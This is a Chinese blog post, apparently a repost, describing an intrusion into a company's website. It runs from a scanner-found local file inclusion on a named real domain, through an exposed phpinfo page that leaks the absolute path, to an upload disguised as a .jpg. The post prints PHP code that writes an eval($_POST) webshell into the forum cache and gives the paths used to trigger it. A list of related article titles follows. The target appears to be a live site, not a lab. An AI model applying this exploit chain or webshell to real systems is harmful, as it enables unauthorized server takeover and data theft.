主站是:www.xxxx.biz
环境:linux php nginx,伪静态的。
主站基本是没希望,不过xss很多,懒得去利用。
有公司有一个新新业务,所以开发部门建立了一个新的网站,所以我也就..........开始看了下dz 7.5的,自己修改了一些东西,尝试了公开的0DAY没戏,各种尝试无果。

最后丢到wvs里面一扫,一会就出来了一个本地包含漏洞,详细继续。

根据WVS扫描结果,漏洞发生在以下页面:
&id=17
这是一个很明显的本地文件包含漏洞

但是这个漏洞使用相对路径来进行包含是不成功的,要使用绝对路径,在以下文件发现phpinfo信息
http://www.cntuike.net/info.php

发现网站绝对路径为
/data0/htdocs/www.dxg.com/view/

于是用WVS的HTTPEDITOR进行访问


此时你已经发现info.php已经被成功包含并执行了

接下来要构造你自己的webshell,通常情况下就是通过上传。在网站上发现了注册会员服务,注册一个账号之后,在用户中心的企业新闻里面新增一个新闻,然后上传一个内容是:

<?php
$fp = @fopen("/data0/htdocs/www.dxg.com/view/bbs/forumdata/cache/cache_1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[chen]);'."\r\n\r\n?".">\r\n");
@fclose($fp);
?>

上传成功后可以看到是一个相对路径

/uploads/contentImg/news/201204/10/133404553855857.jpg

将两者合并起来
/data0/htdocs/www.dxg.com/view/uploads/contentImg/news/201204/10/133404553855857.jpg

于是再用WVS访问

成功之后直接访问
http://www.cntuike.net/bbs/forumdata/cache/cache_1.php

3212323.jpg (12.07 KB)

转载于:https://www.cnblogs.com/mujj/articles/2781900.html

文件包含漏洞对公司测试相关推荐

  1. 【文件包含漏洞-02】文件包含漏洞原理、简单测试实例以及空字符绕过实例

    目录 1 文件包含漏洞 1.1 文件包含漏洞概述 1.2 文件包含漏洞的形成原因/条件 1.3 危害 2 文件包含漏洞简单测试实例 2.1 测试环境 2.2 实例一:本地文件包含 2.3 实例二:远程 ...

  2. 文件包含漏洞——DVWA练习

    前言:在学习文件上传时,制作的图片马需要我们手动去解析,而解析的方法就算用到了文件包含漏洞,所以这次就来学习一下文件包含漏洞. 文件包含漏洞简介 (一)文件包含可以分为本地文件包含和远程文件包含两种. ...

  3. 文件包含漏洞(完整版)

    *本文作者:山东安云,转载来自FreeBuf.COM 0×01 文件包含简介 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间. ...

  4. 文件包含漏洞全面详解

    文件包含漏洞总结 一.什么是文件包含漏洞 二.本地文件包含漏洞(LFI) 三.LFI漏洞利用技巧 1.配合文件上传使用 2.包含Apache日志文件 3.包含SESSION文件 4.包含临时文件 四. ...

  5. 文件包含漏洞实例操作

    文件包含漏洞实例操作 参考文章 本地文件包含漏洞 无限制本地文件包含漏洞 session文件包含漏洞 有限制本地文件包含漏洞 %00截断 路径长度截断 点号截断 远程文件包含漏洞 无限制远程文件包含漏 ...

  6. 文件包含原理及本地文件包含漏洞演示(本地文件,远程包含文件的测试)

    一.文件包含漏洞概述 1.定义:文件包含漏洞是一种最常见的漏洞类型,它会影响依赖于脚本运行时的web应用程序.当应用程序使用攻击者控制的变量构建可执行代码的路径时,文件包含漏洞会导致攻击者任意控制运行 ...

  7. 89.网络安全渗透测试—[常规漏洞挖掘与利用篇5]—[文件包含漏洞详解实战示例]

    我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一.文件包含漏洞详解 1.文件包含漏洞相关概念 2.PHP文件包含漏洞相关概念 3.PHP文件包含漏洞利用:`构 ...

  8. Web安全:文件包含漏洞测试(防止 黑客利用此漏洞.)

    Web安全:文件包含漏洞测试. 文件包含的漏洞是  程序员在开发网站的时候,为了方便自己开发构架,使用了一些包含的函数(比如:php开发语言,include() , include_once() , ...

  9. 渗透测试练习No.18 利用phpinfo+LFI(文件包含漏洞)打进主机

    本文首发于微信公众号"伏波路上学安全",喜欢的小伙伴们请关注公众号持续获取新的文章. 声明:文章来自作者日常学习笔记,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果 ...

最新文章

  1. 作为一个java程序员,常用的linux命令(越攒越多)
  2. Oracle导入csv数据字符集,用SQLLDR把.CSV文件导入到数据库时,出现无法定位字符集句柄以用于字符集标识(0)...
  3. 设计模式中的开闭原则
  4. 《Adobe Photoshop CC经典教程(彩色版)》—第4课4.7节添加调整图层
  5. 设计模式之中介者模式(mediator模式)
  6. 如何用ELK搭建TB级的日志监控系统?
  7. Kotlin协程简介(一)
  8. PAT-A Sign In and Sign Out
  9. input默认提示取消
  10. 支持Android的Qt5预览
  11. AD模式下出现NetLogon 5781错误的对策
  12. 计算机算法专业英语,计算机算法相关术语的英语词汇
  13. Matlab读取Excel各个子表的数据进行拟合
  14. 出差中,推荐几个百度,腾讯,抖音大佬的公众号
  15. 58同城2014校园招聘软件测试笔试题
  16. (6)EndNote——文献管理软件通用操作大全
  17. c++nullptr(空指针常量)、constexpr(常量表达式)
  18. 电脑中常用的“扇区”、“簇”、“块”、“页”等概念
  19. 用AltiumDesigner定义板子形状及开槽
  20. 电子科技大学信息与通信工程学院858考研上岸经验分享(一)

热门文章

  1. vue 动态的修改样式
  2. IDEA上传本地项目到SVN
  3. Android开发笔记(一百七十七)借助FileProvider安装应用
  4. 如何在Linux操作系统定时重启Tomcat服务?
  5. Spark cluster 部署
  6. 转]最长递增子序列问题的求解
  7. Zookeeper概念学习系列之zookeeper是什么?
  8. Node.js使用supervisor遭遇‘supervisor’不是内部或外部命令,如果解决?
  9. 使用C#客户端访问FTP服务的一个解决方案
  10. mysql odbc 驱动_mysql odbc驱动 mysql odbc connector